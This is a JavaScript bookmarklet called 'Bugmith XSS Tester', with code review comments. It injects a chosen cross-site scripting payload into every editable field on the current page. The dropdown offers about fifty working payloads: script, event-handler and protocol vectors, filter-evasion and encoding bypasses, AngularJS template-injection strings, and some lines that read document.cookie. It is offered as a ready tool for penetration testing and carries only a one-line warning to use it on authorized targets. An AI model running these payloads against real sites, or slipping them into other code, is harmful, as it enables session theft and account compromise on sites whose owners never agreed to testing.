Bugmith-XSS-Tester.js
javascript:(function(){
/* Bookmarklet: mounts a fixed, draggable panel on the current page that
   lists the page's editable fields and fills each of them with a marker
   string chosen from a dropdown, so a reviewer can see where the value is
   echoed back. Everything runs inside the page's own origin; status text
   is written into the panel's "results" area. Only block comments are used
   so the listing still works if it is collapsed back onto one line. */
/* Re-entrancy guard: a second activation while the panel is open is a no-op.
   The flag is cleared by the close button, the Escape key, and the catch
   below; the listeners registered on document/window are never removed. */
if(window.__xss_ff_open) return;
window.__xss_ff_open=true;
try {
var d=document;
/* Returns the visible, enabled, non-hidden text-entry elements of the page.
   NOTE(review): [contenteditable] matches the attribute's presence, so
   contenteditable="false" elements are included as well; offsetParent is
   also null for position:fixed elements, so those are skipped — confirm
   both are intended. The hsfc-* selectors presumably target a third-party
   form widget — verify against the pages this is used on. */
function findFields(){
  var fields=d.querySelectorAll('input,textarea,[contenteditable],[data-hsfc-id*="TextInput"],.hsfc-TextInput,input[name*="/"]');
  var result=[];
  for(var i=0;i<fields.length;i++){
    var f=fields[i];
    if(f && f.offsetParent!==null && !f.disabled && f.type!=='hidden'){ result.push(f); }
  }
  return result;
}
/* Builds the marker string for one field. id (the field's name/id) has
   "'<> stripped and is then JSON-quoted into p, so the marker appears in
   the fragment as a well-formed string literal and a firing sink can be
   attributed to its field. type is the dropdown value; the 'reflected'
   through 'dangling' entries ignore p and return fixed text, and unknown
   types fall through to the default fragment. */
function makePayload(id,type){
  id=String(id||'').replace(/[\"'<>]/g,'');
  var p=JSON.stringify('XSS-TEST-'+id);
  switch(type){
    case 'img': return '<img src=x onerror=alert('+p+')>';
    case 'alert': return '<script>alert('+p+')</script>';
    case 'confirm': return '<script>confirm('+p+')</script>';
    case 'svg': return '<svg onload="alert('+p+');"></svg>';
    case 'script': return '<script>console.log('+p+')</script>';
    case 'iframe': return '<iframe src="javascript:alert('+p+');"></iframe>';
    case 'object': return '<object data="javascript:alert('+p+');"></object>';
    case 'embed': return '<embed src="javascript:alert('+p+');">';
    case 'form': return '<form action="javascript:alert('+p+');"><input type=submit></form>';
    case 'input': return '<input onfocus="alert('+p+');" autofocus>';
    case 'body': return '<body onload="alert('+p+');">';
    case 'div': return '<div onmouseover="alert('+p+');">XSS</div>';
    case 'a': return '<a href="javascript:alert('+p+');">click</a>';
    case 'style': return '<style>body{background:url("javascript:alert('+p+')")}</style>';
    case 'meta': return '<meta http-equiv="refresh" content="0;url=javascript:alert('+p+');">';
    case 'link': return '<link rel="stylesheet" href="javascript:alert('+p+');"/>';
    case 'base': return '<base href="javascript:alert('+p+');">';
    case 'img_filter': return '<IMG SRC=#%20onmouseover="alert('+p+')">';
    case 'event': return '<img%20src=x%20oNeRrOr="alert('+p+')">';
    case 'javascript': return 'javascript:alert('+p+')';
    case 'data': return '<img%20src="data:text/html,<script>alert('+p+')</script>">';
    case 'vbscript': return '<img%20src="vbscript:msgbox('+p+')">';
    case 'expression': return '<div%20style="width:expression(alert('+p+'));%20"></div>';
    case 'import': return '<style>@import%20"javascript:alert('+p+');";</style>';
    case 'unicode': return '<img%20src=x%20onerror="\\u0061\\u006c\\u0065\\u0072\\u0074('+p+')">';
    case 'hex': return '<img%20src=x%20onerror="alert('+p+')">';
    case 'url': return '<img%20src=x%20onerror="%61%6c%65%72%74('+p+')">';
    case 'double': return '<img%20src=x%20onerror="%%36%%31%%36%%63%%36%%35%%37%%32%%37%%34('+p+')">';
    case 'mixed': return '<ImG%20sRc=X%20oNeRrOr="ALeRt('+p+')">';
    case 'null': return '<img%20src=x%20onerror="alert('+p+')"\\x00>';
    case 'newline': return '<img%20src=x%20onerror="ale\\nrt('+p+')">';
    case 'tab': return '<img%20src=x%20onerror="ale\\trt('+p+')">';
    case 'comment': return '<img%20src=x%20onerror="alert/**/('+p+')">';
    case 'cdata': return '<![CDATA[<script>alert('+p+')</script>]]>';
    case 'entity': return '<img%20src=x%20onerror=" alert('+p+')">';
    case 'reflected': return '<script>alert(document.domain)</script>';
    case 'reflected_img': return '"><img src=x onerror=alert(document.domain)>';
    case 'stored': return '<script>alert(document.domain)</script>';
    case 'dom': return '"></select><img src=x onerror=alert(document.domain)>';
    case 'dom_js': return 'javascript:alert(document.cookie)';
    case 'angular': return '{{$on.constructor(\'alert(1)\')()}}';
    case 'angular2': return '{{alert(document.domain)}}';
    case 'angular3': return '{{\'a\'.constructor.prototype.charAt=[].join;$eval(\'alert(1)\')}}';
    case 'template': return '${[1].map(alert)}';
    case 'json': return '\\"-alert(1)}//';
    case 'html_tag': return '<body onresize=print()>';
    case 'html_attr': return '" autofocus onfocus=alert(document.domain) x="';
    case 'string': return '\';alert(document.domain)//';
    case 'dangling': return '">';
    default: return '<img src=x onerror="alert('+p+')">';
  }
}
/* --- Panel construction. r is the root; zIndex is the 32-bit maximum so
   the panel stays above page content. --- */
var r=d.createElement('div');
r.id='xss-form-filler';
Object.assign(r.style,{ position:'fixed',bottom:'10px',right:'20px',width:'640px', maxHeight:'80vh',overflow:'auto',background:'#0b1220',color:'#e94560', zIndex:2147483647,padding:'16px',fontFamily:'Consolas,monospace', fontSize:'14px',border:'2px solid #e94560',borderRadius:'12px', boxShadow:'0 -8px 24px rgba(0,0,0,0.7)',cursor:'move' });
var content=d.createElement('div');
var title=d.createElement('strong');
title.textContent='Bugmith XSS Tester';
title.style.color='#e94560';
title.style.fontSize='16px';
var closeBtn=d.createElement('button');
closeBtn.textContent='X';
Object.assign(closeBtn.style,{ background:'transparent',border:'none',color:'#ff6b6b', fontSize:'18px',cursor:'pointer',float:'right' });
/* Close: detach the panel and release the re-entrancy flag. The keydown,
   onmousemove and onmouseup handlers installed below stay in place. */
closeBtn.addEventListener('click',function(){ r.remove();window.__xss_ff_open=false; });
var header=d.createElement('div');
header.appendChild(title);
header.appendChild(closeBtn);
r.appendChild(header);
var warn=d.createElement('div');
warn.textContent='WARNING: Use only on authorized targets.';
warn.style.cssText='color:#9aa5b1;font-size:13px;margin:8px 0;';
content.appendChild(warn);
var lbl=d.createElement('label');
lbl.textContent='Select XSS Payload:';
lbl.style.cssText='display:block;color:#e94560;font-weight:700;margin:6px 0;font-size:14px;';
content.appendChild(lbl);
/* Dropdown of marker types; each optgroup is built from a [value,label]
   table, and the option value is what makePayload receives as type. */
var sel=d.createElement('select');
sel.style.cssText='width:100%;padding:8px;background:#16213e;color:#e94560;border:1px solid #e94560;border-radius:6px;margin-bottom:10px;font-size:13px;';
var basicGroup=d.createElement('optgroup');
basicGroup.label='Basic Tests';
var basicPayloads=[["img","IMG Onerror"],["alert","Alert Dialog"],["confirm","Confirm Dialog"],["svg","SVG Onload"],["script","Script Tag"]];
for(var i=0;i<basicPayloads.length;i++){
  var opt=d.createElement('option');
  opt.value=basicPayloads[i][0];
  opt.textContent=basicPayloads[i][1];
  basicGroup.appendChild(opt);
}
sel.appendChild(basicGroup);
var readyGroup=d.createElement('optgroup');
readyGroup.label='Ready XSS Payloads';
var readyPayloads=[["reflected","Reflected XSS"],["reflected_img","Reflected IMG"],["stored","Stored XSS"],["dom","DOM XSS"],["dom_js","DOM JS"],["angular","AngularJS"],["angular2","Angular Alert"],["angular3","Angular Eval"],["template","Template"],["json","JSON"],["html_tag","HTML Tag"],["html_attr","HTML Attr"],["string","JS String"],["dangling","Dangling"]];
for(var i=0;i<readyPayloads.length;i++){
  var opt=d.createElement('option');
  opt.value=readyPayloads[i][0];
  opt.textContent=readyPayloads[i][1];
  readyGroup.appendChild(opt);
}
sel.appendChild(readyGroup);
var eventGroup=d.createElement('optgroup');
eventGroup.label='Event Handlers';
var eventPayloads=[["input","Input Onfocus"],["body","Body Onload"],["div","Div Onmouseover"],["form","Form Action"]];
for(var i=0;i<eventPayloads.length;i++){
  var opt=d.createElement('option');
  opt.value=eventPayloads[i][0];
  opt.textContent=eventPayloads[i][1];
  eventGroup.appendChild(opt);
}
sel.appendChild(eventGroup);
var protocolGroup=d.createElement('optgroup');
protocolGroup.label='Protocol Handlers';
var protocolPayloads=[["javascript","JavaScript Protocol"],["data","Data URI"],["vbscript","VBScript Protocol"]];
for(var i=0;i<protocolPayloads.length;i++){
  var opt=d.createElement('option');
  opt.value=protocolPayloads[i][0];
  opt.textContent=protocolPayloads[i][1];
  protocolGroup.appendChild(opt);
}
sel.appendChild(protocolGroup);
var tagGroup=d.createElement('optgroup');
tagGroup.label='HTML Tags';
var tagPayloads=[["iframe","IFrame SRC"],["object","Object Data"],["embed","Embed SRC"],["a","Anchor Href"],["style","Style Expression"],["meta","Meta Refresh"],["link","Link Href"],["base","Base Href"]];
for(var i=0;i<tagPayloads.length;i++){
  var opt=d.createElement('option');
  opt.value=tagPayloads[i][0];
  opt.textContent=tagPayloads[i][1];
  tagGroup.appendChild(opt);
}
sel.appendChild(tagGroup);
var filterGroup=d.createElement('optgroup');
filterGroup.label='Filter Evasion';
var filterPayloads=[["img_filter","IMG Filter Bypass"],["event","Event Case Mix"],["mixed","Mixed Case"],["comment","HTML Comment"],["cdata","CDATA Section"],["entity","HTML Entity"]];
for(var i=0;i<filterPayloads.length;i++){
  var opt=d.createElement('option');
  opt.value=filterPayloads[i][0];
  opt.textContent=filterPayloads[i][1];
  filterGroup.appendChild(opt);
}
sel.appendChild(filterGroup);
var encodedGroup=d.createElement('optgroup');
encodedGroup.label='Encoded Payloads';
var encodedPayloads=[["unicode","Unicode Bypass"],["hex","Hex Encoding"],["url","URL Encoding"],["double","Double Encoding"]];
for(var i=0;i<encodedPayloads.length;i++){
  var opt=d.createElement('option');
  opt.value=encodedPayloads[i][0];
  opt.textContent=encodedPayloads[i][1];
  encodedGroup.appendChild(opt);
}
sel.appendChild(encodedGroup);
var advancedGroup=d.createElement('optgroup');
advancedGroup.label='Advanced Techniques';
var advancedPayloads=[["null","Null Byte"],["newline","Newline Bypass"],["tab","Tab Character"],["expression","CSS Expression"],["import","CSS Import"]];
for(var i=0;i<advancedPayloads.length;i++){
  var opt=d.createElement('option');
  opt.value=advancedPayloads[i][0];
  opt.textContent=advancedPayloads[i][1];
  advancedGroup.appendChild(opt);
}
sel.appendChild(advancedGroup);
content.appendChild(sel);
/* --- Action buttons. The click handlers below reference `results`, which
   is declared with var further down; that works because var is hoisted
   and the handlers only run after the panel is fully built. --- */
var btnContainer=d.createElement('div');
btnContainer.style.cssText='display:grid;grid-template-columns:1fr 1fr 1fr;gap:10px;margin:10px 0;';
var previewBtn=d.createElement('button');
previewBtn.textContent='Preview Fields';
previewBtn.style.cssText='padding:10px;background:#16213e;color:#e94560;border:1px solid #e94560;border-radius:6px;cursor:pointer;font-weight:700;';
/* Preview: lists tag/type/name/id of every field findFields() returns.
   NOTE(review): the list is assembled from page-controlled attribute
   values (name, id, type) and assigned via innerHTML, so a field whose
   name contains markup is parsed into the panel; building the list with
   textContent, or escaping &<>" first, would avoid that. */
previewBtn.addEventListener('click',function(){
  var fields=findFields();
  if(!fields.length){ results.innerHTML='ERROR: No editable fields found.'; return; }
  var list='FOUND: '+fields.length+' fields:<br><br>';
  for(var i=0;i<fields.length;i++){
    var f=fields[i];
    var fieldInfo={ tag:f.tagName.toLowerCase(), type:f.type||'none', name:f.name||'none', id:f.id||'none' };
    list+=(i+1)+'. '+fieldInfo.tag+'['+fieldInfo.type+'] - '+fieldInfo.name+' (#'+fieldInfo.id+')<br>';
  }
  results.innerHTML=list;
});
var fillBtn=d.createElement('button');
fillBtn.textContent='Fill All';
fillBtn.style.cssText='padding:10px;background:#e94560;color:#111;border:none;border-radius:6px;cursor:pointer;font-weight:700;';
/* Fill: writes makePayload(name||id||'field_'+i, selected type) into every
   field, then dispatches bubbling input/change events so framework
   listeners see the new value. Each field is bordered green on success
   and red on failure. */
fillBtn.addEventListener('click',function(){
  var fields=findFields();
  var t=sel.value;
  if(!fields.length){ results.innerHTML='ERROR: No fields to fill.'; return; }
  results.innerHTML='FILLING '+fields.length+' fields...<br>';
  var filled=0;
  for(var i=0;i<fields.length;i++){
    var f=fields[i];
    try{
      var pid=f.name||f.id||'field_'+i;
      var payload=makePayload(pid,t);
      f.focus();
      if(f.tagName==='INPUT'||f.tagName==='TEXTAREA'){
        /* Set the value through the prototype's native setter rather than
           the instance property; f._valueTracker looks like React's
           internal value tracker, reset so React registers the change —
           confirm against the frameworks in use. Falls back to a plain
           assignment if either step throws. */
        try{
          var nativeInputValueSetter=Object.getOwnPropertyDescriptor(f.tagName==='INPUT'?window.HTMLInputElement.prototype:window.HTMLTextAreaElement.prototype,'value').set;
          nativeInputValueSetter.call(f,payload);
          if(f._valueTracker){ f._valueTracker.setValue(''); }
        }catch(reactErr){ f.value=payload; }
        f.dispatchEvent(new Event('input',{bubbles:true}));
        f.dispatchEvent(new Event('change',{bubbles:true}));
      }else if(f.hasAttribute&&f.hasAttribute('contenteditable')){
        /* NOTE(review): innerHTML parses the fragment into the live page
           right here, in the tester's own session, before the page has
           stored or rendered anything — so a handler firing from a
           contenteditable field says nothing about the page's handling of
           the value. textContent would be the analogue of setting .value
           above. */
        f.innerHTML=payload;
        f.dispatchEvent(new Event('input',{bubbles:true}));
        f.dispatchEvent(new Event('change',{bubbles:true}));
      }
      f.style.border='3px solid #4ade80';
      filled++;
    }catch(e){
      /* NOTE(review): the failure is only signalled by colour; the clear
         handler logs its failures, and logging e here would match it. */
      f.style.border='3px solid #ef4444';
    }
  }
  results.innerHTML+='<br><br>RESULTS: '+filled+'/'+fields.length+' fields filled successfully.';
});
var clearBtn=d.createElement('button');
clearBtn.textContent='Clear All';
clearBtn.style.cssText='padding:10px;background:#444;color:#fff;border:none;border-radius:6px;cursor:pointer;font-weight:700;';
/* Clear: empties every field the same way Fill writes it, dispatches the
   same events, and removes the coloured border. Failures are logged. */
clearBtn.addEventListener('click',function(){
  var fields=findFields();
  var cleared=0;
  for(var i=0;i<fields.length;i++){
    var f=fields[i];
    try{
      f.focus();
      if(f.tagName==='INPUT'||f.tagName==='TEXTAREA'){
        f.value='';
        f.dispatchEvent(new Event('input',{bubbles:true}));
        f.dispatchEvent(new Event('change',{bubbles:true}));
      }else if(f.hasAttribute&&f.hasAttribute('contenteditable')){
        f.innerHTML='';
        f.dispatchEvent(new Event('input',{bubbles:true}));
        f.dispatchEvent(new Event('change',{bubbles:true}));
      }
      f.style.border='';
      cleared++;
    }catch(e){ console.log('Clear failed for field:',f); }
  }
  results.innerHTML='CLEARED '+cleared+' fields successfully.';
});
btnContainer.appendChild(previewBtn);
btnContainer.appendChild(fillBtn);
btnContainer.appendChild(clearBtn);
content.appendChild(btnContainer);
/* Status area written by the three handlers above. */
var results=d.createElement('div');
results.style.cssText='background:#16213e;border:1px solid #444;border-radius:6px;padding:10px;margin-top:12px;max-height:260px;overflow-y:auto;font-size:12px;color:#aaa;';
results.innerHTML='Ready for enhanced XSS testing...';
content.appendChild(results);
r.appendChild(content);
d.body.appendChild(r);
/* --- Drag support. Dragging starts anywhere on the panel except the
   controls; the panel is clamped to the viewport and switched from
   bottom/right to left/top positioning on first move.
   NOTE(review): d.onmousemove and d.onmouseup are assigned, not added, so
   any handlers the page had on those properties are replaced, and they
   are not restored when the panel is closed. --- */
var isDragging=false,startX,startY,startLeft,startTop;
r.onmousedown=function(e){
  if(e.target===closeBtn||e.target===previewBtn||e.target===fillBtn||e.target===clearBtn||e.target===sel) return;
  isDragging=true;startX=e.clientX;startY=e.clientY;
  var rect=r.getBoundingClientRect();startLeft=rect.left;startTop=rect.top;
  e.preventDefault();
};
d.onmousemove=function(e){
  if(!isDragging) return;
  var newLeft=startLeft+(e.clientX-startX);
  var newTop=startTop+(e.clientY-startY);
  r.style.left=Math.max(0,Math.min(window.innerWidth-r.offsetWidth,newLeft))+'px';
  r.style.top=Math.max(0,Math.min(window.innerHeight-r.offsetHeight,newTop))+'px';
  r.style.bottom='auto';r.style.right='auto';
};
d.onmouseup=function(){ isDragging=false; };
/* Escape closes the panel. The listener is never removed, so after a close
   every later Escape on the page re-runs this (harmlessly, on the
   detached element). */
window.addEventListener('keydown',function(e){ if(e.key==='Escape'){ r.remove(); window.__xss_ff_open=false; } });
} catch(e){
/* Any setup failure is logged and the guard released so the bookmarklet
   can be retried. */
console.error(e); window.__xss_ff_open=false;}
})()